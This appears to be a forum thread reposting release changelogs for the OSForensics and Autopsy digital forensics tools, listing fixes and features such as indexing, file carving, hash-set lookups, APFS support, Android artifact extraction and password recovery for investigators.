Case load window was added at startup and when a case is loaded from the Case Management window. This is useful for showing load progress for very large cases with 10,000s of files in the case.
Report production progress window was added to show some progress activity when very large reports are produced.
New Command Line Parameter to load a specific case (-C <PathToCaseFolder>), if path does not exists or CaseDetails.OSFCase file cannot be found, OSF will default to loading the the last case used.

Create Index:

New indexing engine (Zoom V8 with multi-threaded offline indexing)
Much better indexing performance (3x speed increase)
Updated Create Index interface with new file type selections,
New "Memory optimization / Indexing Limits" step to bypass Pre-scan
Added support for user configurable number of indexing threads (up to 10)
Added options to enable/disable RAM drive
Improved RAM estimations and Indexing Limits settings
Improved indexing Status interface
Updated OSF interface to show multi-threaded indexing
Updated OSF Create Index options to offer more control with file type selection
Removed unnecessary indexing warnings
Added count display for Prescan
Added thousands grouping for large numbers shown in Create Index windows
Increased sleep/wait time while starting indexer to allow for a slower initialisation which could cause an error to be displayed
Renamed indexing process. Now using "OSFIndexer32.exe" and "OSFIndexer64.exe" instead of ZoomEngine32.exe and ZoomEngine64.exe, this should make it more obvious what is running in task manager.
Added some internal checking to clean up detached instances of OSFIndexer and temporary RAM drives.
Fixed a bug with indexing the compete content of Emails in PST files that were text only EMails.

Deleted Files:

Column ordering, visibility and size now saved in OSForensics config file
Configuration options now saved in OSForensics config file
Fixed a crash caused by logging a magic number incorrectly when getting deleted files
Fixed uncaught exception error when loading MFT for some OSF devices
Fix Bug where raw whole disc carving was incorrectly returning progress, causing possible crash when accessing the list.
Added check for buffer overrun when looking for slack $I30 entries
Errors when parsing non-resident attributes of deleted MFT records no longer causes the search to terminate and throw an error message. This is an expected case. Errors are now written to the debug log and the process continues.
Fixed a crash that could occur in deleted file search when file carving is selected but the physical disk has been removed from the system
File Carver, added minimum file size option when carving. Changed "Reserved/Future Use" field in osf_filecarve.conf to "Min File Size"
File Carver, TIFF/CR2 extraction should be better.

Disk Imaging:

Added extra check if the first read fails when verifying the image created.
Disk Preparation
Can now wipe BitLocked drives. Previously these drives appeared to be lock and could not be formatted.

Disk Test:

Fixed issue with formatting as FAT32 on small drives.
Fixed Crash when formatting as FAT32 fails.

E-mail Viewer:

E-mail times now include the timezone offset, both 'Delivery Time' and 'Client Submit Time'
Fixed printed e-mails missing e-mail addresses due to HTML entities not being escaped
Fixed bug where case item title set to '<Use item name>' when selecting 'Use same details for all'

File System Browser:

Added right-click menu option to jump to MFT record in the raw disk viewer
Fixed stack overflow when attempting to add device to case

File Name Search:

Added an "Uncheck all" menu item to uncheck currently selected items
Added 'Windows Shortcut Files' (ie. lnk files) to the file name search presets list
Column ordering, visibility and size now saved in OSForensics config file
Removed folders from results when filtering using hash set
When filtering using hash set, fixed bug with current file being added to results after cancelling search
In hash set' flag is now set for results when hash set is used and made active
Added support for filtering by whether or not the file belongs in the hash set. This allows the user to search for files on disk that match a set of hash values
Re-arranged configuration dialog
Forensic Imaging
Re-arranged tabs
Create Image, for physical disks, disk model and serial number are now saved in the info file
Added new 'Device and SMART Info' for displaying physical disk attributes + SMART info
Device & SMART Info, Added support for export and adding report to case
Device/SMART Info, added mouseover tooltip descriptions for SMART attributes

Forensics Copy:

Moved allocation of virtual disk image to thread to prevent system from being unresponsive

Hash Set:

Added option to create 'Quick hash set', allowing the user to quickly create a hash set by specifying a list of hashes
Fixed deleted hash set databases appearing in the file name search config drop down box
Re-organised buttons in main window
Added functionality for importing Project VIC JSON files with MD5 hashes & optimised the import load time.
Added default database name when importing VIC data set
Stopped navigation bar being disabled when importing hash set. User can now do other tasks in parallel to importing a large hash set.
Fixed hash set operation LED still "active" when there's an error
Fixed number display and file size formatting to be more readable for large import files (> 4GB)
When creating hash set databases, columns are no longer created for hashes that don't exist (eg. VIC/NSRL datasets)
Hash set lookup
Added right click menu option to open files in internal viewer
Fixed incorrect # files hashed text due to not updating the dialog once all files are hashed
When performing hash set lookups, hashes are no longer checked for columns that do not exist. This reduces the query time for large hash sets. e.g. we don't check for SHA1 matches if the particular hash set doesn't have SHA1 values.
When performing single file hash lookups, filename matches are no longer queried. This reduces the query time for large hash sets.

Install to USB:

Added help Link
Added separate "temp build" directory field when using WinPEBuilder.

Internal File Viewer:

EFS Support. When an EFS file now opened in the file viewer a temp copy will be created and passed to the hex and text viewee. If the matching certificate has been installed on the system then the text should appear decrypted.
Hex View, added right-click option to add selected strings to case (as HTML file)
Fixed potential mem leak when generating video thumbnails
Fixed potential concurrency issues when loading videos

Memory viewer:

Column ordering, visibility and size now saved in OSForensics config file
Added button to add memory dump to case
Removed 'Error' text and icon from message box when process memory cannot be dumped because of access restrictions

Mismatch File Search:

Fixed a bug with the CSV export dialog displaying a .HTML file extensions instead of .CSV

NSRL Hash Import:

Import 9x faster. While importing repeated file hashes, checks for duplicity are no longer being done using a lookup on non-indexed database (very slow). Now checks are done by comparing product code between two consecutive lines in input file.
Import will create new database automatically with default name based on date and time. Thus, incremental import is no longer an option.
New NSRL import config window to specify input and (temp) output folders
Temp Output folder can be specified so that user can specify RAM drive or SSD to speed up the import. Database is then moved from temp location to default hash sets location.
Updated help file with info about allocating enough space on a RAM drive.
Status now displays percentage counter during file importing

Password Recovery:

Added tab to allow PFX certificates to be installed on the local system, to facilitate opening EFS encrypted files when the certificate and password are available
Column ordering, visibility and size now saved in OSForensics config file
Browser passwords, made some changes to Firefox login recovery, now has a 64bit and 32bit helper executable (as FireFox have started distributing as 64bit).
Registry passwords, now displaying password hint value next to 'NT Password' column. Displays '(empty)' if not present.
Registry Passwords , added support for win10 anniversary update for live system in Forensics mode
Removed a "File not found" error when running the windows password search on a non system drive

Prefetch Viewer:

Added right-click option to export selected items to CSV

Rainbow Tables:

Fixed crash occurring when cracking hashes from a pwdump txt file - wrong data types were being past to format string when secure case logger was enabled

Raw Disk Viewer:

Added progress window when carving to file
Renamed 'Decode' window to 'Disk Info'
Renamed 'Data Interpreter' window to 'Data Decode', split windows and shuffled content between decode window.
Added right-click menu options to 'Data Decode' window, Jump to File and Jump to File Record.
Clicking on file paths now open the internal viewer
Clicking on LCN/offsets now jump to the offset in the raw disk viewer
Data Interpreter window now shows the MFT record number and filepath if the current cursor position is inside the $MFT file
Fixed crash issue when sector size could not be determined
Fixed right-click "Jump to offset" not working some of the time

Recent Activity:

Added a quick filter option (text box and button) to quickly apply a text filter to recent activity items
"Show empty activity types" checkbox to default to on so empty types are displayed
Results are now sorted by Date (desc order) by default
Fixed possible crash when reading jumplist info

Registry Viewer:

Support for generating reports for known registry hives (currently only SOFTWARE hive at the moment)
Fixed a possible crash when processing a registry file

SQLite Browser:

Will checks for Skype Sqlite database files during "Scan for DB Files".
Resizeable Dialog/Controls
Option (enabled by default) to convert known timestamps to readable format
Scan Folder button is now more useful. Will now populate with locations of known SQLite files (e.g. Chrome and Firefox profile directories)
Scan Folder button will scan for known Android user data directory (where apps usually store their own data) on currently selected drive

System Information:

A new tab is now created for every new result
Added option to restore command lists back to default
Added "Recovery of Bitlocker Keys" to command list
Added ability to assign a name to an entered command. This name will then be displayed in the output/report.
Added support for Embedded Python 3.6.5
Removed the "Get" from the start of some item names.
Changed button text from 'Add...' to 'New...' when adding new commands
Moved 'Reset lists to default' option to dialog window. Added confirmation prompt to prevent accidental press.
Replaced spin control for moving items up/down due to overriding the handling of mouse wheel messages
Re-organized controls
Added command to get current clipboard contents
Added command to get anti malware (windows defender) software status
Added command to get current TPM status
Started encoding HTML special entities in output from tools so anything with HTML characters will display correctly
Fixed crash possible with getting printer info when system returns bad information.

Triage Wizard (now renamed to Auto-Triage):

Changed Wizard icon to fingerprint icon & removed forensics dude. R.I.P forensics dude, we loved you, but the world just wan't ready for you.
Added option to create logical image with known system files
Added agent help text when mouse is hovering over a control
Added a free disk space check (for at least 1GB + memory size if memory dump selected)
Fixed a unhandled exception that could occur in the triage wizard when running a scan on a non system drive (eg D) and having only windows passwords selected.
Fixed a missing file error message that was displayed when running a scan on a non system drive (eg D) and having only windows passwords selected and 0 results were found
Fixed a crash caused by trial limitations when running the triage wizard

Web Browser:

Added status bar to browser.
Can now select export format as Web Archive Format (.mht) when exporting webpage.
Can now export linked PDF, ZIP and other files. Also added check boxes to allow user to select what is downloaded.
There is an option to download videos (MP4 format) from sites such as YouTube and add them to the case.
Added a progress indicator for downloading large files.

Misc:

Added colour coding of encrypted files displayed in a file list
Added exit confirmation message
Added warning message on OSF shutdown whenever the USB write-protect settings are changed during the course of execution
Fixed a long delay at startup when not running as Admin
Removed agent icon from feature description text on start window
After successfully saving a file to disk, fixed a bug with activity monitor displaying task is still active
Changed how temp files are stored, each thread now has a temp folder
Increased a timeout (from 60 seconds to 180 seconds) when trying to repair esedb databases with esetutl as was timing out during triage runs
To prevent machine from sleeping when running from USB, the mouse will jiggle if the time between user input (i.e. keyboard or mouse input) surpasses 10 secs.
Added DLL (MSVCR120.dll) required by wkhtmltopdf.exe to installer (error seen on windows )
Switched debug logging to logging library g3log for thread-safe, crash-safe, faster logging

[close]

http://www.osforensics.com/
Titel: OSForensics 6.0.5 Beta
Beitrag von: SiLæncer am 08 Juni, 2018, 19:00
Whats new:>>

Big additions are Win10 Timeline extraction and OCR on images while indexing.
Fingers crossed, this will be the final beta release.

http://www.osforensics.com/
Titel: OSForensics 6.0 Build 1000
Beitrag von: SiLæncer am 22 Juni, 2018, 12:25
Changelog

Case Management
Added "Export case" feature
Added a list of reports that have been generated (in case directory or last known export directory)
When creating/editing case, user can now specify whether or not USB write-block should be enabled. Whenever the USB write-block settings are changed, a warning is displayed to the user to detach/re-attach connected USB devices for the settings to take effect.
Changed list view to allow groups (devices, reports, files etc) to be collapsible
Added last access date to case management when case is loaded
Fixed error copying files with long file paths in when a report was created and the report contained deep / long paths.
Fixed a bug when creating a case report that was leaving a file handle open
Added support for encrypting PDF report
Added predefined offenses list to 'Offense' drop down list when creating/editing case
Case Details Dialog, fixed bug that might cause case narrative text to be reset to default when editing case details.
Case Details Dialog, will prompt user to confirm cancelling changes when they edited case details fields and clicking cancel.
Case Export, changed text on "Cancel" button to "Close" on the Generate Report Dialog since custom logos are saved to config once changed in the dialog.
Re-added "E-mail Delivery Time" to report and the associated timezone
Case load window was added at startup and when a case is loaded from the Case Management window. This is useful for showing load progress for very large cases with 10,000s of files in the case.
Report production progress window was added to show some progress activity when very large reports are produced.
New Command Line Parameter to load a specific case (-C ), if path does not exists or CaseDetails.OSFCase file cannot be found, OSF will default to loading the the last case used.
Can now insert images into the case narrative text using the HTML editor. Images need to have already been added to the case. Previously images could be added, but the links where broken when a report was produced.
Added unique 'Case Item ID' attribute to each case item. This ID is displayed in the 'Manage Case' window, as well as included in the generated reports. The ID is stored within the .OSFMeta file for each case item. Case Manager maintains 'Next Case Item ID' variable that gets assigned to any new items added to the case.
Fixed special characters not being escaped when generating reports
Create index
New indexing engine (Zoom V8 with multi-threaded offline indexing)
Much better indexing performance (3x speed increase)
Updated Create Index interface with new file type selections,
New "Memory optimization / Indexing Limits" step to bypass Pre-scan
Added support for user configurable number of indexing threads (up to 10)
Added options to enable RAM drive for temporary files
Improved RAM estimations and Indexing Limits settings
Improved indexing Status interface
Updated OSF interface to show multi-threaded indexing
Updated OSF Create Index options to offer more control with file type selection
Removed unnecessary indexing warnings
Added count display for Prescan
Added thousands grouping for large numbers shown in Create Index windows
Increased sleep/wait time while starting indexer to allow for a slower initialisation which could cause an error to be displayed
Renamed indexing process. Now using "OSFIndexer32.exe" and "OSFIndexer64.exe" instead of ZoomEngine32.exe and ZoomEngine64.exe, this should make it more obvious what is running in task manager.
Added some internal checking to clean up detached instances of OSFIndexer and temporary RAM drives.
Fixed a bug with indexing the compete content of Emails in PST files that were text only EMails.
OCR (Optical Character Recognition) can now be done on photographic images while they are being indexed. Like all OCR, the results depend on the quality and resolution of the source image, how clear the text is and the level of contrast. This is only supported on Win10. Depending on the images >10 images per second are possible.
Deleted Files
Column ordering, visibility and size now saved in OSForensics config file
Configuration options now saved in OSForensics config file
Fixed a crash caused by logging a magic number incorrectly when getting deleted files
Fixed uncaught exception error when loading MFT for some OSF devices
Fix Bug where raw whole disc carving was incorrectly returning progress, causing possible crash when accessing the list.
Added check for buffer overrun when looking for slack $I30 entries
Errors when parsing non-resident attributes of deleted MFT records no longer causes the search to terminate and throw an error message. This is an expected case. Errors are now written to the debug log and the process continues.
Fixed a crash that could occur in deleted file search when file carving is selected but the physical disk has been removed from the system
File Carver, added minimum file size option when carving. Changed "Reserved/Future Use" field in osf_filecarve.conf to "Min File Size"
File Carver, TIFF/CR2 extraction should be better.
Disk Imaging
Added extra check if the first read fails when verifying the image created.
Previously if the disk did not contain a valid MBR this would cause it not to show up in the list (as it would have no partitions) But the disk might be file system boot sector. These disk are now correctly shown.
There is now the option to specify primary and/or secondary hash functions for imaging disk. So the user can select SHA1 instead of just MD5. Or calculate two hashes at the same time.
Disk Preparation
Can now wipe BitLocked drives. Previously these drives appeared to be lock and could not be formatted.
In case of a physical drive failure, additional error codes have been added to the status window
Disk Test
Fixed issue with formatting as FAT32 on small drives.
Fixed Crash when formatting as FAT32 fails.
E-mail Viewer
E-mail times now include the timezone offset, both 'Delivery Time' and 'Client Submit Time'
Fixed printed e-mails missing e-mail addresses due to HTML entities not being escaped
Fixed bug where case item title set to '' when selecting 'Use same details for all'
File System Browser
Added right-click menu option to jump to MFT record in the raw disk viewer
Fixed stack overflow when attempting to add device to case
File Name Search
Added an "Uncheck all" menu item to uncheck currently selected items
Added 'Windows Shortcut Files' (ie. lnk files) to the file name search presets list
Column ordering, visibility and size now saved in OSForensics config file
Removed folders from results when filtering using hash set
When filtering using hash set, fixed bug with current file being added to results after cancelling search
'In hash set' flag is now set for results when hash set is used and made active
Added support for filtering by whether or not the file belongs in the hash set. This allows the user to search for files on disk that match a set of hash values
Re-arranged configuration dialog
Forensic Imaging
Re-arranged tabs
Create Image, for physical disks, disk model and serial number are now saved in the info file
Added new 'Device and SMART Info' for displaying physical disk attributes + SMART info
Device & SMART Info, Added support for export and adding report to case
Device/SMART Info, added mouseover tooltip descriptions for SMART attributes
Forensics Copy
Moved allocation of virtual disk image to thread to prevent system from being unresponsive
Hash Set
Added option to create 'Quick hash set', allowing the user to quickly create a hash set by specifying a list of hashes
Fixed deleted hash set databases appearing in the file name search config drop down box
Re-organised buttons in main window
Added functionality for importing Project VIC JSON files with MD5 hashes & optimised the import load time.
Added default database name when importing VIC data set
Stopped navigation bar being disabled when importing hash set. User can now do other tasks in parallel to importing a large hash set.
Fixed hash set operation LED still "active" when there's an error
Fixed number display and file size formatting to be more readable for large import files (> 4GB)
When creating hash set databases, columns are no longer created for hashes that don't exist (eg. VIC/NSRL datasets)
Hash set lookup
Added right click menu option to open files in internal viewer
Fixed incorrect # files hashed text due to not updating the dialog once all files are hashed
When performing hash set lookups, hashes are no longer checked for columns that do not exist. This reduces the query time for large hash sets. e.g. we don't check for SHA1 matches if the particular hash set doesn't have SHA1 values. Results were a significant speed up for hash lookups.
When performing single file hash lookups, filename matches are no longer queried. This reduces the query time for large hash sets.
Install and run from USB
Added help Link
Added separate "temp build" directory field when using WinPEBuilder.
Updated WinPE builder to deal with new latest WinPE10 changes
Internal File Viewer
EFS Support (encrypted file system). When an EFS file now opened in the file viewer a temp copy will be created and passed to the hex and text viewer. If the matching certificate has been installed on the system then the text should appear decrypted.
Hex View, added right-click option to add selected strings to case (as HTML file)
Fixed potential mem leak when generating video thumbnails
Fixed potential concurrency issues when loading videos
Added OCR view (Win10 only)
Memory viewer
Column ordering, visibility and size now saved in OSForensics config file
Added button to add memory dump to case
Removed 'Error' text and icon from message box when process memory cannot be dumped because of access restrictions
Updated version of Volatility Workbench, with Mac & Linux support and ability to add your own profiles.
Mismatch File Search
Fixed a bug with the CSV export dialog displaying a .HTML file extensions instead of .CSV
NSRL Hash Import
Import 9x faster. While importing repeated file hashes, checks for duplicity are no longer being done using a lookup on non-indexed database (very slow). Now checks are done by comparing product code between two consecutive lines in input file.
Import will create new database automatically with default name based on date and time. Thus, incremental import is no longer an option.
New NSRL import config window to specify input and (temp) output folders
Temp Output folder can be specified so that user can specify RAM drive or SSD to speed up the import. Database is then moved from temp location to default hash sets location.
Updated help file with info about allocating enough space on a RAM drive.
Status now displays percentage counter during file importing
Password Recovery
Added tab to allow PFX certificates to be installed on the local system, to facilitate opening EFS encrypted files when the certificate and password are available
Column ordering, visibility and size now saved in OSForensics config file
Browser passwords, made some changes to Firefox login recovery, now has a 64bit and 32bit helper executable (as FireFox have started distributing as 64bit).
Registry passwords, now displaying password hint value next to 'NT Password' column. Displays '(empty)' if not present.
Registry Passwords , added support for win10 anniversary update for live system in Forensics mode
Removed a "File not found" error when running the windows password search on a non system drive
Prefetch Viewer
Added right-click option to export selected items to CSV
Rainbow Tables
Fixed crash occurring when cracking hashes from a pwdump txt file - wrong data types were being past to format string when secure case logger was enabled
Raw Disk Viewer
Added progress window when carving to file
Renamed 'Decode' window to 'Disk Info'
Renamed 'Data Interpreter' window to 'Data Decode', split windows and shuffled content between decode window.
Added right-click menu options to 'Data Decode' window, Jump to File and Jump to File Record.
Clicking on file paths now open the internal viewer
Clicking on LCN/offsets now jump to the offset in the raw disk viewer
Data Interpreter window now shows the MFT record number and filepath if the current cursor position is inside the $MFT file
Fixed crash issue when sector size could not be determined
Fixed right-click "Jump to offset" not working some of the time
Hexadecimal addresses copied from the Windows calculator into the search box didn't work. The calculator was inserting non printable characters into the string. Non printable characters are now being removed.
Recent Activity
Added a quick filter option (text box and button) to quickly apply a text filter to recent activity items
"Show empty activity types" checkbox to default to on so empty types are displayed
Results are now sorted by Date (desc order) by default
Fixed possible crash when reading jumplist info
Added function to collect new Win10 Timeline database for artifacts
Added more displayed information for windows event items.
Registry Viewer
Support for generating reports for known registry hives (currently only SOFTWARE hive at the moment)
Fixed a possible crash when processing a registry file
SQLite Browser
Will checks for Skype Sqlite database files during "Scan for DB Files".
Resizeable Dialog/Controls
Option (enabled by default) to convert known timestamps to readable format
Scan Folder button is now more useful. Will now populate with locations of known SQLite files (e.g. Chrome and Firefox profile directories)
Scan Folder button will scan for known Android user data directory (where apps usually store their own data) on currently selected drive
System Information
A new tab is now created for every new system information command
Added option to restore command lists back to default
Added "Recovery of Bitlocker Keys" to command list
Added ability to assign a name to an entered command. This name will then be displayed in the output/report.
Added support for Embedded Python 3.6.5
Removed the "Get" from the start of some item names.
Changed button text from 'Add...' to 'New...' when adding new commands
Moved 'Reset lists to default' option to dialog window. Added confirmation prompt to prevent accidental press.
Replaced spin control for moving items up/down due to overriding the handling of mouse wheel messages
Re-organized controls
Added command to get current clipboard contents
Added command to get anti malware (windows defender) software status
Added command to get current TPM status
Started encoding HTML special entities in output from tools so anything with HTML characters will display correctly
Fixed crash possible with getting printer info when system returns bad information.
Triage Wizard (now renamed to Auto-Triage)
Changed Wizard icon to fingerprint icon & removed forensics dude. R.I.P forensics dude, we loved you, but the world just wan't ready for you.
Added option to create logical image with known system files
Added agent help text when mouse is hovering over a control
Added a free disk space check (for at least 1GB + memory size if memory dump selected)
Fixed a unhandled exception that could occur in the triage wizard when running a scan on a non system drive (eg D) and having only windows passwords selected.
Fixed a missing file error message that was displayed when running a scan on a non system drive (eg D) and having only windows passwords selected and 0 results were found
Fixed a crash caused by trial limitations when running the triage wizard
Web Browser
Added status bar to browser.
Can now select export format as Web Archive Format (.mht) when exporting webpage.
Can now export linked PDF, ZIP and other files. Also added check boxes to allow user to select what is downloaded.
There is an option to download videos (MP4 format) from sites such as YouTube and add them to the case.
Added a progress indicator for downloading large files.
Misc
Added colour coding of encrypted files displayed in a file list
Added exit confirmation message
Added warning message on OSF shutdown whenever the USB write-protect settings are changed during the course of execution
Fixed a long delay at startup when not running as Admin
Removed agent icon from feature description text on start window
After successfully saving a file to disk, fixed a bug with activity monitor displaying task is still active
Changed how temp files are stored, each thread now has a temp folder
Increased a timeout (from 60 seconds to 180 seconds) when trying to repair esedb databases with esetutl as was timing out during triage runs
To prevent machine from sleeping when running from USB, the mouse will jiggle if the time between user input (i.e. keyboard or mouse input) surpasses 10 secs.
Added DLL (MSVCR120.dll) required by wkhtmltopdf.exe to installer (error seen on windows )
Switched debug logging to logging library g3log for thread-safe, crash-safe, faster logging

[close]

http://www.osforensics.com/
Titel: OSForensics 6.0 Build 1001
Beitrag von: SiLæncer am 25 Juni, 2018, 17:00
Whats new:>>

Build 1001 was made shortly after build 1000 to fix a day 1 indexing bug

http://www.osforensics.com/
Titel: OSForensics 6.0 Build 1002
Beitrag von: SiLæncer am 06 Juli, 2018, 18:00
Changelog

Case Manager
Reduced memory usage of path flags structure
Case logging now enabled by Default
Create Index
Fixed memory (handle) leak in Win10 caused by bug in ShellExecuteEx() in certain builds of Win10. Replaced with CreateProcess() calls.
Improved error messages regarding "Maximum file size limit exceeded..." to show file size.
Improved various error messages to show both actual temp file path and file being indexed
Fixed bug with Pre-Scan count displayed being much bigger than the actual count used. Did not affect pre-scan result.
Minor changes to fix "(Win10 only)" text for the "Use OCR" checkbox appearing in Win10 builds
Improved accuracy of URLs being reported in the Create Index Status
Deleted Files
Added sort By FG and BG color.
File Name Search
Improved performance by doing fewer string compares/copies if wildcard '*' is used
Hash Set
Added a "skip files smaller than" option when creating a new hash set to avoid creating hash sets which match the large amount of small byte files on a system
Image Viewer
Initial Support for Non Password protected logical Android Backup files (.ab) allowing Image Viewer to be able to browse contents of Android Backup Files (.ab).
Internal Viewer
Added BitLocker Recovery Key RegEx pattern to Filter Presets for Hex File Viewer

[close]

http://www.osforensics.com/
Titel: OSForensics 6.0.1003
Beitrag von: SiLæncer am 10 Juli, 2018, 09:17
Whats new:>>

Create Index Added RAM check before proceeding with user specified Create Index Size Settings. Without this, users may have proceeded with size settings that led to exhausting their RAM and the indexer crashing.
Search Index Fixed bug when searching index containing file types: binary files, recycle bin meta, or email attachments.

http://www.osforensics.com/
Titel: OSForensics 6.0 Build 1004
Beitrag von: SiLæncer am 17 Juli, 2018, 09:12
Changelog

Create Index:

Fixed out of bounds exception
New indexer build to address issues with multi-threaded indexing from ext2 image (and possibly other filesystems)

Volatility Workbench:

Fixed issue with edit boxes.

Misc:

Fixed a bug preventing the workflow from being customised correctly

[close]

http://www.osforensics.com/
Titel: Autopsy 4.8.0
Beitrag von: SiLæncer am 09 August, 2018, 06:00
(https://s26.postimg.cc/915w3piwp/screenshot_1239.png)
Autopsy is a graphical interface to The Sleuth Kit and other analysis tools. It was designed to be an extensible platform so that it can be an end-to-end digital forensics solution that incorporates plug-in modules from both open and closed source projects. The application provides users with various analysis features and with the possibility of generating HTML or CSV reports as well.

License: GPL

Changelog

New Features:

Data Source Grouping:

The case tree view can now be grouped by data source.
Keyword and file search can now be restricted to a data source.

Central Repository / Correlation:

New common files search feature that finds files that exist in multiple devices in the same case.
The Other Occurrences content viewer now shows matches in the current case (in addition to central repository).
Central repository options panel now shows cases that are in repo.
A comment about a file can be created and saved in the central repository so that future cases and see it.

Keyword Search:

Can enable OCR text extraction of PDF and JPG files using Tesseract.
Keyword search module normalizes Unicode text.
Keyword search module uses ICU to convert text files that do not have a BOM.

Tagging:

Tagging menu changed to have user defined tags at top and "quick tag" removed one level of menus.
New "Replace Tag" feature to change the tag on an item.

Other:

SQLite tables can be now be exported to CSV files.
An interesting file artifact is now created when a "zip bomb" is detected.
An object detection ingest module was added to the Experimental module. It requires an OpenCV trained model.

Bug Fixes:

Expanding the case tree is more efficient.
Improved "zip bomb" detection.
Assorted small bug fixes are included.

[close]

http://www.sleuthkit.org/autopsy
Titel: OSForensics 6.1 Beta 8
Beitrag von: SiLæncer am 12 September, 2018, 20:00
Changelog

Changes since 6.1 beta 7

File system support
- Several fixes for APFS support in OSF modules
- Support for compressed files (zlib & lzvn) in APFS

Mobile Artifacts / Android Artifacts
- Renamed "Mobile Artifacts" to "Android Artifacts" to reflect current ability of module (iOS is not currently supported).

Raw Disk Viewer
- Regular expression searching, made a change to prevent an infinite loop when a partial match was found

SQLite Browser
-Fixed bug that prevented additional sqlite viewers to be open even after closing opened sqlite viewers.
- Fixed bug with "View Cell with internal viewer" returning "Not an Error" message.

Start/Navigation
- File and Hex Viewer, will now open File Preview Tab as default.

[close]

http://www.osforensics.com/
Titel: OSForensics 6.1 Build 1000
Beitrag von: SiLæncer am 27 September, 2018, 12:24
Changelog

Case Manager:
New feature: Paste Clipboard to Case. Can now add external BITMAP (e.g. screenshots) and Copy/Paste Text to case. This provide an additional method of capturing web pages.
Added support for mounting an image file as a "group" device. Partitions are listed as a folder of the top device.
When displaying the volume shadow info to add to case, the creation time now includes the GMT offset
Create Index:
Updates to handle indexing Apple's APFS file system (indexing encrypted volumes is not supported, but coming soon).
Fixed multi-threaded indexing problems with some image filesystems such as EXT2
Improved memory estimation (was previously not including some offline buffers)
New "broad numeric matching" feature. Allows for better searching of currency values and part numbers with hashes in the number.
Added Precognitive Search feature, return matches for trigger keywords during the "Create Index" process. So you don't need to wait for the indexing process to be completed before seeing the search results. It is also possible to use pre-made word lists with the Precog search.
The concept of a template has been removed, instead you can now save and load previously used configurations. Some of the advanced template options, like extreme binary string extraction and stemming are now on Step 2 of the create index process.
Deleted Files:
Fixed NTFS MFT record size calculation, which can prevent parsing of the MFT in the raw disk viewer and in deleted files module.
Partial support for scanning "group" devices for deleted files
Fixed buffer overrun crash when parsing slack space for $I30 record
Email Viewer:
Single Email Viewer can view Gmail email stored within Android mailstore.username@gmail.com.db.
File Name Search:
Fixed a bug when searching for deleted files
File System Browser:
Fixed crash with internal viewer when clicking prev/next after file system browser is closed
File system support:
Apple's APFS file system is now supported. Including support for compression (zlib & lzvn) and encryption. So you can browse and search files from a Mac machine in Windows.
Forensic Imaging:
Made some changes to how Encase format images (.E01 and .Ex01) are created to work around an issue that limited the final image creation to a maximum of 64 .E01/.Ex01 files, which resulted in images larger than 100GB in size and more than 64 files being unreadable.
Added copy Logical Android Image. Will obtain files off Android device using 'adb pull' command over a USB connection. To use this with a device connected over USB, you must enable USB debugging in the Android device system settings, under Developer options. So the device needs to be unlocked to do this.
Fixed image type not displaying correctly for unicode filenames
Hash lookup:
Fixed hang when error occurs while attempting to read from deleted files
Install to USB:
Updated WinPEBuilder used for self boot USB, added option under Program Tab to allow selection of Storage Area Network (SAN) Policy. The recommend setting for OSForensics is, 3 - Doesn't mount storage devices, to prevent introduction of artifacts. However, if you need access to disks, e.g. external disk drive to image to, you can change it accordingly
Internal Viewers:
Started saving viewer x,y positions (previously was just size) in config file and will restore them to the last position on next open
Internal Viewer - File Info
When viewing compress archived (e.g. .7z or .ab), added right-click option to save file to disk.
Show the total/used/free space for "partition" folders. Show the disk size for devices/partitions
Fixed multithreading issues with sharing a handle to a video file. This potentially can cause a crash.
Added checkbox to link the selected file in the list (file name search, mismatch search, etc...), and the current file in the internal viewer. This allows for faster selecting and previewing of pictures.
Android Artifacts:
Addition of new module to scan for android mobile device information. A limited number of artifacts are supported in this release. Additional data will be extracted in future releases.
Currently only supports Android disk image (looks for items in data folder) and/or backup (apps folder)
Initial support for password encrypted android backups. When opening file in FileViewer, OSF will prompt for password and attempt to decrypt the backup.
Password Recovery:
Fixed crash when running windows login / password search simultaneously due to shared global variable
Fixed bug with list view column widths not being saved correctly, could cause URL column to be incorrectly hidden and column widths to be reset each time OSF was started.
Now displays available dictionaries before file is selected, will display an info message when a 40bit encrypted file selected (which don't use the dictionaries).
Added a "Add Dictionary" button that will copy a selected text file to the OSF dictionaries folder and create a simple default definition file to use the dictionary
Renamed folder where pre-installed and user dictionaries are stored (from PDF to Dictionaries)
Raw disk viewer:
Regular expression searching, made a change to prevent an infinite loop when a partial match was found
Added clickable link for File Rec#
Fixed bug with jumping to an LBA from the MBR/GPT
Added option to jump to MFT record
Added decoding of $FILE_NAME attribute
Added decoding of NTFS attribute common header
Added support for parsing MFT attributes SECURITY_DESCRIPTOR, OBJECT_ID, VOLUME_NAME, VOLUME_INFORMATION, INDEX_ROOT
APFS GPT partition GUID now detected and displayed in Data Decode window
APFS file system string now properly displayed in Disk Info window
Fixed excessive quotes for 'Context' field in exported CSV
Replace unprintable characters with '.' when displaying context
Recent Activity:
Now collects more information from LNK files (Windows Explorer - Recent Items) such as volume name, volume serial and link target create/access/modified dates
Fixed a bug where subitems counts in the treeview was not actively reflecting the actual filtered counts.
Made a change so windows timeline entries always display the same amount of lines in the file list tab for consistency
Report Templates:
Updated report templates to include Mobile Artifacts
SQLite Browser
Changed SQLite Browser into a viewer so users can have multiple instances open (Up to 10).
Fixed bug that prevented additional sqlite viewers to be open even after closing opened sqlite viewers.
Fixed bug with "View Cell with internal viewer" returning "Not an Error" message.
Start/Navigation:
Added "Add to case" action on start screen and left hand menu button to allow quick access to add a device to a case
File and Hex Viewer, will now open File Preview Tab as default.
Reordered the left side buttons. Removed Android Artifact and About button from the Navigation Menu, but still accessible from the Start page. User Workflow configuration setting will reset to defaults with changes upon first starting V6.1.1000
System Information:
Added new commands to get Windows information (product name, build and install date) and last shutdown time from the registry
Fixed crash bug due to buffer overflow with long case device names. Device names over 12 characters caused problems in the system information module
UsnJrnl Viewer
Fixed incorrect filenames due to incorrect length truncation
Web Browser:
Export Webpage Dialog can be resized vertically to fit smaller screens.
Misc:
Added support for mounting "group" devices such as entire physical disks. Contained partitions are mounted as "subdevices" and appears as folders under the parent device
Changed timezone drop down for GMT/UTC 0 from "GMT +0:00" to "GMT 0:00" to visually stand out more in list
Made some changes so that the logo and version text on the main start page are now next to the help / mouse over text area to save some vertical space

[close]

http://www.osforensics.com/
Titel: OSForensics 6.1 Build 1001
Beitrag von: SiLæncer am 09 Oktober, 2018, 12:24
Changelog

Raw disk viewer:

Added right-click menu to export/add decoded master file table (MFT) to case

Internal viewer:

An error message is now shown when there is not enough memory to extract strings. Previously it would silently stop the extraction process in a low memory situation.
Added, File load in progress, status text when loading large text files
